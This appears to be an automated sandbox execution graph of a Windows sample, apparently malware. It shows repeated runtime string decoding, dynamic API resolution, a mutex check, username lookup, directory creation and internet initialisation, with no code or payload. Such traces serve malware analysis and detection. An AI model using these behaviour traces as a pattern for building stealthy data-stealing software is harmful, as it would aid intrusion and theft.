                                                                                execution_graph 68523 6c7eb8ae 68525 6c7eb8ba ___scrt_is_nonwritable_in_current_image 68523->68525 68524 6c7eb8c9 68525->68524 68526 6c7eb8e3 dllmain_raw 68525->68526 68527 6c7eb8de 68525->68527 68526->68524 68528 6c7eb8fd dllmain_crt_dispatch 68526->68528 68536 6c7cbed0 DisableThreadLibraryCalls LoadLibraryExW 68527->68536 68528->68524 68528->68527 68530 6c7eb91e 68531 6c7eb94a 68530->68531 68537 6c7cbed0 DisableThreadLibraryCalls LoadLibraryExW 68530->68537 68531->68524 68532 6c7eb953 dllmain_crt_dispatch 68531->68532 68532->68524 68534 6c7eb966 dllmain_raw 68532->68534 68534->68524 68535 6c7eb936 dllmain_crt_dispatch dllmain_raw 68535->68531 68536->68530 68537->68535 68538 417250 68562 40254e 68538->68562 68546 417274 68660 40fa9c _EH_prolog lstrlenA 68546->68660 68549 40fa9c 4 API calls 68550 41729b 68549->68550 68551 40fa9c 4 API calls 68550->68551 68552 4172a2 68551->68552 68664 40f9e1 68552->68664 68554 4172ab 68555 4172ee OpenEventA 68554->68555 68556 4172d4 CloseHandle Sleep 68555->68556 68557 4172fb 68555->68557 68858 40fb4d 68556->68858 68559 417303 CreateEventA 68557->68559 68668 41695f _EH_prolog 68559->68668 68859 4024d7 memset 68562->68859 68564 402562 68565 4024d7 9 API calls 68564->68565 68566 402573 68565->68566 68567 4024d7 9 API calls 68566->68567 68568 402584 68567->68568 68569 4024d7 9 API calls 68568->68569 68570 402595 68569->68570 68571 4024d7 9 API calls 68570->68571 68572 4025a6 68571->68572 68573 4024d7 9 API calls 68572->68573 68574 4025b7 68573->68574 68575 4024d7 9 API calls 68574->68575 68576 4025c8 68575->68576 68577 4024d7 9 API calls 68576->68577 68578 4025d9 68577->68578 68579 4024d7 9 API calls 68578->68579 68580 4025ea 68579->68580 68581 4024d7 9 API calls 68580->68581 68582 4025fb 68581->68582 68583 4024d7 9 API calls 68582->68583 68584 40260c 68583->68584 68585 4024d7 9 API calls 68584->68585 68586 40261d 68585->68586 68587 4024d7 9 API calls 68586->68587 68588 40262e 68587->68588 68589 4024d7 9 API calls 68588->68589 68590 40263f 68589->68590 68591 4024d7 9 API calls 68590->68591 68592 402650 68591->68592 68593 4024d7 9 API calls 68592->68593 68594 402661 68593->68594 68595 4024d7 9 API calls 68594->68595 68596 402672 68595->68596 68597 4024d7 9 API calls 68596->68597 68598 402683 68597->68598 68599 4024d7 9 API calls 68598->68599 68600 402694 68599->68600 68601 4024d7 9 API calls 68600->68601 68602 4026a5 68601->68602 68603 4024d7 9 API calls 68602->68603 68604 4026b6 68603->68604 68605 4024d7 9 API calls 68604->68605 68606 4026c7 68605->68606 68607 4024d7 9 API calls 68606->68607 68608 4026d8 68607->68608 68609 4024d7 9 API calls 68608->68609 68610 4026e9 68609->68610 68611 4024d7 9 API calls 68610->68611 68612 4026fa 68611->68612 68613 4024d7 9 API calls 68612->68613 68614 40270b 68613->68614 68615 4024d7 9 API calls 68614->68615 68616 40271c 68615->68616 68617 4024d7 9 API calls 68616->68617 68618 40272d 68617->68618 68619 4024d7 9 API calls 68618->68619 68620 40273e 68619->68620 68621 4024d7 9 API calls 68620->68621 68622 40274f 68621->68622 68623 4024d7 9 API calls 68622->68623 68624 402760 68623->68624 68625 4024d7 9 API calls 68624->68625 68626 402771 68625->68626 68627 4024d7 9 API calls 68626->68627 68628 402782 68627->68628 68629 4024d7 9 API calls 68628->68629 68630 402793 68629->68630 68631 4024d7 9 API calls 68630->68631 68632 4027a4 68631->68632 68633 4024d7 9 API calls 68632->68633 68634 4027b5 68633->68634 68635 4024d7 9 API calls 68634->68635 68636 4027c6 68635->68636 68637 4024d7 9 API calls 68636->68637 68638 4027d7 68637->68638 68639 4024d7 9 API calls 68638->68639 68640 4027e8 68639->68640 68641 417330 LoadLibraryA 68640->68641 68642 417348 68641->68642 68643 41753a LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 68641->68643 68652 417369 20 API calls 68642->68652 68644 417598 GetProcAddress 68643->68644 68645 4175aa 68643->68645 68644->68645 68646 4175b3 GetProcAddress GetProcAddress 68645->68646 68647 4175dc 68645->68647 68646->68647 68648 4175e5 GetProcAddress 68647->68648 68649 4175f7 68647->68649 68648->68649 68650 417600 GetProcAddress 68649->68650 68651 417612 68649->68651 68650->68651 68653 417262 68651->68653 68654 41761b GetProcAddress GetProcAddress 68651->68654 68652->68643 68655 40f923 68653->68655 68654->68653 68656 40f931 68655->68656 68657 40f953 68656->68657 68658 40f949 lstrcpy 68656->68658 68659 40fbcb GetProcessHeap HeapAlloc GetUserNameA 68657->68659 68658->68657 68659->68546 68662 40fadc 68660->68662 68661 40fb01 68661->68549 68662->68661 68663 40faee lstrcpy lstrcat 68662->68663 68663->68661 68666 40f9f7 68664->68666 68665 40fa20 68665->68554 68666->68665 68667 40fa18 lstrcpy 68666->68667 68667->68665 68669 416973 68668->68669 68670 40f923 lstrcpy 68669->68670 68671 416986 68670->68671 68880 4134fd _EH_prolog 68671->68880 68673 416996 68882 4135ac _EH_prolog 68673->68882 68675 4169a5 68884 40f997 lstrlenA 68675->68884 68678 40f997 2 API calls 68679 4169c9 68678->68679 68888 4027ef 68679->68888 68685 416aba 68686 40f9e1 lstrcpy 68685->68686 68687 416acc 68686->68687 68688 40f923 lstrcpy 68687->68688 68689 416aeb 68688->68689 68690 40fa9c 4 API calls 68689->68690 68691 416b04 68690->68691 69478 40fa28 _EH_prolog 68691->69478 68694 40f9e1 lstrcpy 68695 416b2d 68694->68695 68696 416b54 CreateDirectoryA 68695->68696 69482 4010b1 _EH_prolog 68696->69482 68704 416b9d 68705 40f9e1 lstrcpy 68704->68705 68706 416baf 68705->68706 68707 40f9e1 lstrcpy 68706->68707 68708 416bc1 68707->68708 69605 40f95a 68708->69605 68711 40fa9c 4 API calls 68712 416be5 68711->68712 68713 40f9e1 lstrcpy 68712->68713 68714 416bf2 68713->68714 68715 40fa28 3 API calls 68714->68715 68716 416c11 68715->68716 68717 40f9e1 lstrcpy 68716->68717 68718 416c1e 68717->68718 68719 416c39 InternetOpenA 68718->68719 69609 40fb4d 68719->69609 68721 416c55 InternetOpenA 68722 40f95a lstrcpy 68721->68722 68723 416c85 68722->68723 68724 40f923 lstrcpy 68723->68724 68725 416c9c 68724->68725 69610 4104dd _EH_prolog GetWindowsDirectoryA 68725->69610 68728 40f95a lstrcpy 68729 416cc5 68728->68729 69629 403af5 _EH_prolog 68729->69629 68731 416ccf 69765 411cd8 _EH_prolog 68731->69765 68733 416cd7 68734 40f923 lstrcpy 68733->68734 68735 416d0b 68734->68735 68736 4010b1 2 API calls 68735->68736 68737 416d23 68736->68737 69785 40514c _EH_prolog 68737->69785 68739 416d2d 69964 411715 _EH_prolog 68739->69964 68741 416d35 68742 40f923 lstrcpy 68741->68742 68743 416d5d 68742->68743 68744 4010b1 2 API calls 68743->68744 68745 416d75 68744->68745 68746 40514c 46 API calls 68745->68746 68747 416d7f 68746->68747 69972 4114ee _EH_prolog 68747->69972 68749 416d87 68750 40f923 lstrcpy 68749->68750 68751 416daf 68750->68751 68752 4010b1 2 API calls 68751->68752 68753 416dc7 68752->68753 68754 40514c 46 API calls 68753->68754 68755 416dd1 68754->68755 69983 411649 _EH_prolog 68755->69983 68757 416dd9 68758 4010b1 2 API calls 68757->68758 68759 416ded 68758->68759 69992 414604 _EH_prolog 68759->69992 68762 40f95a lstrcpy 68763 416e06 68762->68763 68764 40f923 lstrcpy 68763->68764 68765 416e20 68764->68765 70334 4041b2 _EH_prolog 68765->70334 68767 416e29 68768 4010b1 2 API calls 68767->68768 68769 416e61 68768->68769 70353 40ed08 _EH_prolog 68769->70353 68858->68555 68864 40245c 68859->68864 68863 402536 memset 68863->68564 68876 4181c0 68864->68876 68869 410b12 68870 4024be CryptStringToBinaryA 68869->68870 68871 4024d0 strcat GetProcessHeap RtlAllocateHeap 68870->68871 68872 402308 68871->68872 68873 40231b 68872->68873 68874 40238b ??_U@YAPAXI 68873->68874 68875 4023a6 68874->68875 68875->68863 68877 402469 memset 68876->68877 68878 410b12 68877->68878 68879 40249e CryptStringToBinaryA 68878->68879 68879->68869 68881 413513 68880->68881 68881->68673 68883 4135c2 68882->68883 68883->68675 68886 40f9af 68884->68886 68885 40f9da 68885->68678 68886->68885 68887 40f9d0 lstrcpy 68886->68887 68887->68885 68889 4024d7 9 API calls 68888->68889 68890 4027f9 68889->68890 68891 4024d7 9 API calls 68890->68891 68892 40280a 68891->68892 68893 4024d7 9 API calls 68892->68893 68894 40281b 68893->68894 68895 4024d7 9 API calls 68894->68895 68896 40282c 68895->68896 68897 4024d7 9 API calls 68896->68897 68898 40283d 68897->68898 68899 4024d7 9 API calls 68898->68899 68900 40284e 68899->68900 68901 4024d7 9 API calls 68900->68901 68902 40285f 68901->68902 68903 4024d7 9 API calls 68902->68903 68904 402870 68903->68904 68905 4024d7 9 API calls 68904->68905 68906 402881 68905->68906 68907 4024d7 9 API calls 68906->68907 68908 402892 68907->68908 68909 4024d7 9 API calls 68908->68909 68910 4028a3 68909->68910 68911 4024d7 9 API calls 68910->68911 68912 4028b4 68911->68912 68913 4024d7 9 API calls 68912->68913 68914 4028c5 68913->68914 68915 4024d7 9 API calls 68914->68915 68916 4028d6 68915->68916 68917 4024d7 9 API calls 68916->68917 68918 4028e7 68917->68918 68919 4024d7 9 API calls 68918->68919 68920 4028f8 68919->68920 68921 4024d7 9 API calls 68920->68921 68922 402909 68921->68922 68923 4024d7 9 API calls 68922->68923 68924 40291a 68923->68924 68925 4024d7 9 API calls 68924->68925 68926 40292b 68925->68926 68927 4024d7 9 API calls 68926->68927 68928 40293c 68927->68928 68929 4024d7 9 API calls 68928->68929 68930 40294d 68929->68930 68931 4024d7 9 API calls 68930->68931 68932 40295e 68931->68932 68933 4024d7 9 API calls 68932->68933 68934 40296f 68933->68934 68935 4024d7 9 API calls 68934->68935 68936 402980 68935->68936 68937 4024d7 9 API calls 68936->68937 68938 402991 68937->68938 68939 4024d7 9 API calls 68938->68939 68940 4029a2 68939->68940 68941 4024d7 9 API calls 68940->68941 68942 4029b3 68941->68942 68943 4024d7 9 API calls 68942->68943 68944 4029c4 68943->68944 68945 4024d7 9 API calls 68944->68945 68946 4029d5 68945->68946 68947 4024d7 9 API calls 68946->68947 68948 4029e6 68947->68948 68949 4024d7 9 API calls 68948->68949 68950 4029f7 68949->68950 68951 4024d7 9 API calls 68950->68951 68952 402a08 68951->68952 68953 4024d7 9 API calls 68952->68953 68954 402a19 68953->68954 68955 4024d7 9 API calls 68954->68955 68956 402a2a 68955->68956 68957 4024d7 9 API calls 68956->68957 68958 402a3b 68957->68958 68959 4024d7 9 API calls 68958->68959 68960 402a4c 68959->68960 68961 4024d7 9 API calls 68960->68961 68962 402a5d 68961->68962 68963 4024d7 9 API calls 68962->68963 68964 402a6e 68963->68964 68965 4024d7 9 API calls 68964->68965 68966 402a7f 68965->68966 68967 4024d7 9 API calls 68966->68967 68968 402a90 68967->68968 68969 4024d7 9 API calls 68968->68969 68970 402aa1 68969->68970 68971 4024d7 9 API calls 68970->68971 68972 402ab2 68971->68972 68973 4024d7 9 API calls 68972->68973 68974 402ac3 68973->68974 68975 4024d7 9 API calls 68974->68975 68976 402ad4 68975->68976 68977 4024d7 9 API calls 68976->68977 68978 402ae5 68977->68978 68979 4024d7 9 API calls 68978->68979 68980 402af6 68979->68980 68981 4024d7 9 API calls 68980->68981 68982 402b07 68981->68982 68983 4024d7 9 API calls 68982->68983 68984 402b18 68983->68984 68985 4024d7 9 API calls 68984->68985 68986 402b29 68985->68986 68987 4024d7 9 API calls 68986->68987 68988 402b3a 68987->68988 68989 4024d7 9 API calls 68988->68989 68990 402b4b 68989->68990 68991 4024d7 9 API calls 68990->68991 68992 402b5c 68991->68992 68993 4024d7 9 API calls 68992->68993 68994 402b6d 68993->68994 68995 4024d7 9 API calls 68994->68995 68996 402b7e 68995->68996 68997 4024d7 9 API calls 68996->68997 68998 402b8f 68997->68998 68999 4024d7 9 API calls 68998->68999 69000 402ba0 68999->69000 69001 4024d7 9 API calls 69000->69001 69002 402bb1 69001->69002 69003 4024d7 9 API calls 69002->69003 69004 402bc2 69003->69004 69005 4024d7 9 API calls 69004->69005 69006 402bd3 69005->69006 69007 4024d7 9 API calls 69006->69007 69008 402be4 69007->69008 69009 4024d7 9 API calls 69008->69009 69010 402bf5 69009->69010 69011 4024d7 9 API calls 69010->69011 69012 402c06 69011->69012 69013 4024d7 9 API calls 69012->69013 69014 402c17 69013->69014 69015 4024d7 9 API calls 69014->69015 69016 402c28 69015->69016 69017 4024d7 9 API calls 69016->69017 69018 402c39 69017->69018 69019 4024d7 9 API calls 69018->69019 69020 402c4a 69019->69020 69021 4024d7 9 API calls 69020->69021 69022 402c5b 69021->69022 69023 4024d7 9 API calls 69022->69023 69024 402c6c 69023->69024 69025 4024d7 9 API calls 69024->69025 69026 402c7d 69025->69026 69027 4024d7 9 API calls 69026->69027 69028 402c8e 69027->69028 69029 4024d7 9 API calls 69028->69029 69030 402c9f 69029->69030 69031 4024d7 9 API calls 69030->69031 69032 402cb0 69031->69032 69033 4024d7 9 API calls 69032->69033 69034 402cc1 69033->69034 69035 4024d7 9 API calls 69034->69035 69036 402cd2 69035->69036 69037 4024d7 9 API calls 69036->69037 69038 402ce3 69037->69038 69039 4024d7 9 API calls 69038->69039 69040 402cf4 69039->69040 69041 4024d7 9 API calls 69040->69041 69042 402d05 69041->69042 69043 4024d7 9 API calls 69042->69043 69044 402d16 69043->69044 69045 4024d7 9 API calls 69044->69045 69046 402d27 69045->69046 69047 4024d7 9 API calls 69046->69047 69048 402d38 69047->69048 69049 4024d7 9 API calls 69048->69049 69050 402d49 69049->69050 69051 4024d7 9 API calls 69050->69051 69052 402d5a 69051->69052 69053 4024d7 9 API calls 69052->69053 69054 402d6b 69053->69054 69055 4024d7 9 API calls 69054->69055 69056 402d7c 69055->69056 69057 4024d7 9 API calls 69056->69057 69058 402d8d 69057->69058 69059 4024d7 9 API calls 69058->69059 69060 402d9e 69059->69060 69061 4024d7 9 API calls 69060->69061 69062 402daf 69061->69062 69063 4024d7 9 API calls 69062->69063 69064 402dc0 69063->69064 69065 4024d7 9 API calls 69064->69065 69066 402dd1 69065->69066 69067 4024d7 9 API calls 69066->69067 69068 402de2 69067->69068 69069 4024d7 9 API calls 69068->69069 69070 402df3 69069->69070 69071 4024d7 9 API calls 69070->69071 69072 402e04 69071->69072 69073 4024d7 9 API calls 69072->69073 69074 402e15 69073->69074 69075 4024d7 9 API calls 69074->69075 69076 402e26 69075->69076 69077 4024d7 9 API calls 69076->69077 69078 402e37 69077->69078 69079 4024d7 9 API calls 69078->69079 69080 402e48 69079->69080 69081 4024d7 9 API calls 69080->69081 69082 402e59 69081->69082 69083 4024d7 9 API calls 69082->69083 69084 402e6a 69083->69084 69085 4024d7 9 API calls 69084->69085 69086 402e7b 69085->69086 69087 4024d7 9 API calls 69086->69087 69088 402e8c 69087->69088 69089 4024d7 9 API calls 69088->69089 69090 402e9d 69089->69090 69091 4024d7 9 API calls 69090->69091 69092 402eae 69091->69092 69093 4024d7 9 API calls 69092->69093 69094 402ebf 69093->69094 69095 4024d7 9 API calls 69094->69095 69096 402ed0 69095->69096 69097 4024d7 9 API calls 69096->69097 69098 402ee1 69097->69098 69099 4024d7 9 API calls 69098->69099 69100 402ef2 69099->69100 69101 4024d7 9 API calls 69100->69101 69102 402f03 69101->69102 69103 4024d7 9 API calls 69102->69103 69104 402f14 69103->69104 69105 4024d7 9 API calls 69104->69105 69106 402f25 69105->69106 69107 4024d7 9 API calls 69106->69107 69108 402f36 69107->69108 69109 4024d7 9 API calls 69108->69109 69110 402f47 69109->69110 69111 4024d7 9 API calls 69110->69111 69112 402f58 69111->69112 69113 4024d7 9 API calls 69112->69113 69114 402f69 69113->69114 69115 4024d7 9 API calls 69114->69115 69116 402f7a 69115->69116 69117 4024d7 9 API calls 69116->69117 69118 402f8b 69117->69118 69119 4024d7 9 API calls 69118->69119 69120 402f9c 69119->69120 69121 4024d7 9 API calls 69120->69121 69122 402fad 69121->69122 69123 4024d7 9 API calls 69122->69123 69124 402fbe 69123->69124 69125 4024d7 9 API calls 69124->69125 69126 402fcf 69125->69126 69127 4024d7 9 API calls 69126->69127 69128 402fe0 69127->69128 69129 4024d7 9 API calls 69128->69129 69130 402ff1 69129->69130 69131 4024d7 9 API calls 69130->69131 69132 403002 69131->69132 69133 4024d7 9 API calls 69132->69133 69134 403013 69133->69134 69135 4024d7 9 API calls 69134->69135 69136 403024 69135->69136 69137 4024d7 9 API calls 69136->69137 69138 403035 69137->69138 69139 4024d7 9 API calls 69138->69139 69140 403046 69139->69140 69141 4024d7 9 API calls 69140->69141 69142 403057 69141->69142 69143 4024d7 9 API calls 69142->69143 69144 403068 69143->69144 69145 4024d7 9 API calls 69144->69145 69146 403079 69145->69146 69147 4024d7 9 API calls 69146->69147 69148 40308a 69147->69148 69149 4024d7 9 API calls 69148->69149 69150 40309b 69149->69150 69151 4024d7 9 API calls 69150->69151 69152 4030ac 69151->69152 69153 4024d7 9 API calls 69152->69153 69154 4030bd 69153->69154 69155 4024d7 9 API calls 69154->69155 69156 4030ce 69155->69156 69157 4024d7 9 API calls 69156->69157 69158 4030df 69157->69158 69159 4024d7 9 API calls 69158->69159 69160 4030f0 69159->69160 69161 4024d7 9 API calls 69160->69161 69162 403101 69161->69162 69163 4024d7 9 API calls 69162->69163 69164 403112 69163->69164 69165 4024d7 9 API calls 69164->69165 69166 403123 69165->69166 69167 4024d7 9 API calls 69166->69167 69168 403134 69167->69168 69169 4024d7 9 API calls 69168->69169 69170 403145 69169->69170 69171 4024d7 9 API calls 69170->69171 69172 403156 69171->69172 69173 4024d7 9 API calls 69172->69173 69174 403167 69173->69174 69175 4024d7 9 API calls 69174->69175 69176 403178 69175->69176 69177 4024d7 9 API calls 69176->69177 69178 403189 69177->69178 69179 4024d7 9 API calls 69178->69179 69180 40319a 69179->69180 69181 4024d7 9 API calls 69180->69181 69182 4031ab 69181->69182 69183 4024d7 9 API calls 69182->69183 69184 4031bc 69183->69184 69185 4024d7 9 API calls 69184->69185 69186 4031cd 69185->69186 69187 4024d7 9 API calls 69186->69187 69188 4031de 69187->69188 69189 4024d7 9 API calls 69188->69189 69190 4031ef 69189->69190 69191 4024d7 9 API calls 69190->69191 69192 403200 69191->69192 69193 4024d7 9 API calls 69192->69193 69194 403211 69193->69194 69195 4024d7 9 API calls 69194->69195 69196 403222 69195->69196 69197 4024d7 9 API calls 69196->69197 69198 403233 69197->69198 69199 4024d7 9 API calls 69198->69199 69200 403244 69199->69200 69201 4024d7 9 API calls 69200->69201 69202 403255 69201->69202 69203 4024d7 9 API calls 69202->69203 69204 403266 69203->69204 69205 4024d7 9 API calls 69204->69205 69206 403277 69205->69206 69207 4024d7 9 API calls 69206->69207 69208 403288 69207->69208 69209 4024d7 9 API calls 69208->69209 69210 403299 69209->69210 69211 4024d7 9 API calls 69210->69211 69212 4032aa 69211->69212 69213 4024d7 9 API calls 69212->69213 69214 4032bb 69213->69214 69215 4024d7 9 API calls 69214->69215 69216 4032cc 69215->69216 69217 4024d7 9 API calls 69216->69217 69218 4032dd 69217->69218 69219 4024d7 9 API calls 69218->69219 69220 4032ee 69219->69220 69221 4024d7 9 API calls 69220->69221 69222 4032ff 69221->69222 69223 4024d7 9 API calls 69222->69223 69224 403310 69223->69224 69225 4024d7 9 API calls 69224->69225 69226 403321 69225->69226 69227 4024d7 9 API calls 69226->69227 69228 403332 69227->69228 69229 4024d7 9 API calls 69228->69229 69230 403343 69229->69230 69231 4024d7 9 API calls 69230->69231 69232 403354 69231->69232 69233 4024d7 9 API calls 69232->69233 69234 403365 69233->69234 69235 4024d7 9 API calls 69234->69235 69236 403376 69235->69236 69237 4024d7 9 API calls 69236->69237 69238 403387 69237->69238 69239 4024d7 9 API calls 69238->69239 69240 403398 69239->69240 69241 4024d7 9 API calls 69240->69241 69242 4033a9 69241->69242 69243 4024d7 9 API calls 69242->69243 69244 4033ba 69243->69244 69245 4024d7 9 API calls 69244->69245 69246 4033cb 69245->69246 69247 4024d7 9 API calls 69246->69247 69248 4033dc 69247->69248 69249 4024d7 9 API calls 69248->69249 69250 4033ed 69249->69250 69251 4024d7 9 API calls 69250->69251 69252 4033fe 69251->69252 69253 4024d7 9 API calls 69252->69253 69254 40340f 69253->69254 69255 4024d7 9 API calls 69254->69255 69256 403420 69255->69256 69257 4024d7 9 API calls 69256->69257 69258 403431 69257->69258 69259 4024d7 9 API calls 69258->69259 69260 403442 69259->69260 69261 4024d7 9 API calls 69260->69261 69262 403453 69261->69262 69263 4024d7 9 API calls 69262->69263 69264 403464 69263->69264 69265 4024d7 9 API calls 69264->69265 69266 403475 69265->69266 69267 4024d7 9 API calls 69266->69267 69268 403486 69267->69268 69269 4024d7 9 API calls 69268->69269 69270 403497 69269->69270 69271 4024d7 9 API calls 69270->69271 69272 4034a8 69271->69272 69273 4024d7 9 API calls 69272->69273 69274 4034b9 69273->69274 69275 4024d7 9 API calls 69274->69275 69276 4034ca 69275->69276 69277 4024d7 9 API calls 69276->69277 69278 4034db 69277->69278 69279 4024d7 9 API calls 69278->69279 69280 4034ec 69279->69280 69281 4024d7 9 API calls 69280->69281 69282 4034fd 69281->69282 69283 4024d7 9 API calls 69282->69283 69284 40350e 69283->69284 69285 4024d7 9 API calls 69284->69285 69286 40351f 69285->69286 69287 4024d7 9 API calls 69286->69287 69288 403530 69287->69288 69289 4024d7 9 API calls 69288->69289 69290 403541 69289->69290 69291 4024d7 9 API calls 69290->69291 69292 403552 69291->69292 69293 4024d7 9 API calls 69292->69293 69294 403563 69293->69294 69295 4024d7 9 API calls 69294->69295 69296 403574 69295->69296 69297 4024d7 9 API calls 69296->69297 69298 403585 69297->69298 69299 4024d7 9 API calls 69298->69299 69300 403596 69299->69300 69301 4024d7 9 API calls 69300->69301 69302 4035a7 69301->69302 69303 4024d7 9 API calls 69302->69303 69304 4035b8 69303->69304 69305 4024d7 9 API calls 69304->69305 69306 4035c9 69305->69306 69307 4024d7 9 API calls 69306->69307 69308 4035da 69307->69308 69309 4024d7 9 API calls 69308->69309 69310 4035eb 69309->69310 69311 4024d7 9 API calls 69310->69311 69312 4035fc 69311->69312 69313 4024d7 9 API calls 69312->69313 69314 40360d 69313->69314 69315 4024d7 9 API calls 69314->69315 69316 40361e 69315->69316 69317 4024d7 9 API calls 69316->69317 69318 40362f 69317->69318 69319 4024d7 9 API calls 69318->69319 69320 403640 69319->69320 69321 4024d7 9 API calls 69320->69321 69322 403651 69321->69322 69323 4024d7 9 API calls 69322->69323 69324 403662 69323->69324 69325 4024d7 9 API calls 69324->69325 69326 403673 69325->69326 69327 4024d7 9 API calls 69326->69327 69328 403684 69327->69328 69329 4024d7 9 API calls 69328->69329 69330 403695 69329->69330 69331 4024d7 9 API calls 69330->69331 69332 4036a6 69331->69332 69333 4024d7 9 API calls 69332->69333 69334 4036b7 69333->69334 69335 4024d7 9 API calls 69334->69335 69336 4036c8 69335->69336 69337 4024d7 9 API calls 69336->69337 69338 4036d9 69337->69338 69339 4024d7 9 API calls 69338->69339 69340 4036ea 69339->69340 69341 4024d7 9 API calls 69340->69341 69342 4036fb 69341->69342 69343 4024d7 9 API calls 69342->69343 69344 40370c 69343->69344 69345 4024d7 9 API calls 69344->69345 69346 40371d 69345->69346 69347 4024d7 9 API calls 69346->69347 69348 40372e 69347->69348 69349 4024d7 9 API calls 69348->69349 69350 40373f 69349->69350 69351 4024d7 9 API calls 69350->69351 69352 403750 69351->69352 69353 4024d7 9 API calls 69352->69353 69354 403761 69353->69354 69355 4024d7 9 API calls 69354->69355 69356 403772 69355->69356 69357 4024d7 9 API calls 69356->69357 69358 403783 69357->69358 69359 4024d7 9 API calls 69358->69359 69360 403794 69359->69360 69361 4024d7 9 API calls 69360->69361 69362 4037a5 69361->69362 69363 4024d7 9 API calls 69362->69363 69364 4037b6 69363->69364 69365 4024d7 9 API calls 69364->69365 69366 4037c7 69365->69366 69367 4024d7 9 API calls 69366->69367 69368 4037d8 69367->69368 69369 4024d7 9 API calls 69368->69369 69370 4037e9 69369->69370 69371 4024d7 9 API calls 69370->69371 69372 4037fa 69371->69372 69373 4024d7 9 API calls 69372->69373 69374 40380b 69373->69374 69375 4024d7 9 API calls 69374->69375 69376 40381c 69375->69376 69377 4024d7 9 API calls 69376->69377 69378 40382d 69377->69378 69379 4024d7 9 API calls 69378->69379 69380 40383e 69379->69380 69381 4024d7 9 API calls 69380->69381 69382 40384f 69381->69382 69383 4024d7 9 API calls 69382->69383 69384 403860 69383->69384 69385 4024d7 9 API calls 69384->69385 69386 403871 69385->69386 69387 4024d7 9 API calls 69386->69387 69388 403882 69387->69388 69389 4024d7 9 API calls 69388->69389 69390 403893 69389->69390 69391 4024d7 9 API calls 69390->69391 69392 4038a4 69391->69392 69393 4024d7 9 API calls 69392->69393 69394 4038b5 69393->69394 69395 4024d7 9 API calls 69394->69395 69396 4038c6 69395->69396 69397 4024d7 9 API calls 69396->69397 69398 4038d7 69397->69398 69399 4024d7 9 API calls 69398->69399 69400 4038e8 69399->69400 69401 4024d7 9 API calls 69400->69401 69402 4038f9 69401->69402 69403 4024d7 9 API calls 69402->69403 69404 40390a 69403->69404 69405 4024d7 9 API calls 69404->69405 69406 40391b 69405->69406 69407 4024d7 9 API calls 69406->69407 69408 40392c 69407->69408 69409 4024d7 9 API calls 69408->69409 69410 40393d 69409->69410 69411 4024d7 9 API calls 69410->69411 69412 40394e 69411->69412 69413 4024d7 9 API calls 69412->69413 69414 40395f 69413->69414 69415 4024d7 9 API calls 69414->69415 69416 403970 69415->69416 69417 4024d7 9 API calls 69416->69417 69418 403981 69417->69418 69419 4024d7 9 API calls 69418->69419 69420 403992 69419->69420 69421 4024d7 9 API calls 69420->69421 69422 4039a3 69421->69422 69423 4024d7 9 API calls 69422->69423 69424 4039b4 69423->69424 69425 4024d7 9 API calls 69424->69425 69426 4039c5 69425->69426 69427 4024d7 9 API calls 69426->69427 69428 4039d6 69427->69428 69429 4024d7 9 API calls 69428->69429 69430 4039e7 69429->69430 69431 4024d7 9 API calls 69430->69431 69432 4039f8 69431->69432 69433 4024d7 9 API calls 69432->69433 69434 403a09 69433->69434 69435 4024d7 9 API calls 69434->69435 69436 403a1a 69435->69436 69437 4024d7 9 API calls 69436->69437 69438 403a2b 69437->69438 69439 4024d7 9 API calls 69438->69439 69440 403a3c 69439->69440 69441 4024d7 9 API calls 69440->69441 69442 403a4d 69441->69442 69443 417645 69442->69443 69444 417652 43 API calls 69443->69444 69445 417a2a 9 API calls 69443->69445 69444->69445 69446 417b39 69445->69446 69447 417acb GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 69445->69447 69448 417b46 8 API calls 69446->69448 69449 417bf9 69446->69449 69447->69446 69448->69449 69450 417c70 69449->69450 69451 417c02 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 69449->69451 69452 417d02 69450->69452 69453 417c7d 6 API calls 69450->69453 69451->69450 69454 417dd9 69452->69454 69455 417d0f 9 API calls 69452->69455 69453->69452 69456 417e50 69454->69456 69457 417de2 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 69454->69457 69455->69454 69458 417e82 69456->69458 69459 417e59 GetProcAddress GetProcAddress 69456->69459 69457->69456 69460 417eb4 69458->69460 69461 417e8b GetProcAddress GetProcAddress 69458->69461 69459->69458 69462 417ec1 10 API calls 69460->69462 69463 417fa0 69460->69463 69461->69460 69462->69463 69464 418000 69463->69464 69465 417fa9 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 69463->69465 69466 418009 GetProcAddress 69464->69466 69467 41801b 69464->69467 69465->69464 69466->69467 69468 418024 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 69467->69468 69469 41807b 69467->69469 69468->69469 69470 416aac 69469->69470 69471 418084 GetProcAddress 69469->69471 69472 410b5c _EH_prolog 69470->69472 69471->69470 69473 40f923 lstrcpy 69472->69473 69474 410b83 69473->69474 69475 40f923 lstrcpy 69474->69475 69476 410b9a GetSystemTime 69475->69476 69477 410bb8 69476->69477 69477->68685 69480 40fa65 69478->69480 69479 40fa89 69479->68694 69480->69479 69481 40fa77 lstrcpy lstrcat 69480->69481 69481->69479 69483 40f95a lstrcpy 69482->69483 69484 4010cc 69483->69484 69485 40f95a lstrcpy 69484->69485 69486 4010dc 69485->69486 69487 40f95a lstrcpy 69486->69487 69488 4010ec 69487->69488 69489 40f95a lstrcpy 69488->69489 69490 401108 69489->69490 69491 41390c _EH_prolog 69490->69491 69492 4135ac _EH_prolog 69491->69492 69493 413932 69492->69493 69494 40f997 2 API calls 69493->69494 69495 413946 69494->69495 69496 40f997 2 API calls 69495->69496 69497 413953 69496->69497 69498 40f997 2 API calls 69497->69498 69499 413960 69498->69499 69500 40f923 lstrcpy 69499->69500 69501 413970 69500->69501 69502 40f923 lstrcpy 69501->69502 69503 413981 69502->69503 69504 40f923 lstrcpy 69503->69504 69505 413992 69504->69505 69506 40f923 lstrcpy 69505->69506 69507 4139a3 69506->69507 69508 40f923 lstrcpy 69507->69508 69509 4139b4 69508->69509 69510 40f923 lstrcpy 69509->69510 69595 4139c5 69510->69595 69511 4020f9 lstrcpy 69511->69595 69513 40212d lstrcpy 69513->69595 69514 413adc StrCmpCA 69514->69595 69515 413b5d StrCmpCA 69516 41435b 69515->69516 69515->69595 69517 40f9e1 lstrcpy 69516->69517 69518 41436a 69517->69518 70628 40212d 69518->70628 69521 40f9e1 lstrcpy 69523 414381 69521->69523 69522 413d0a StrCmpCA 69524 414316 69522->69524 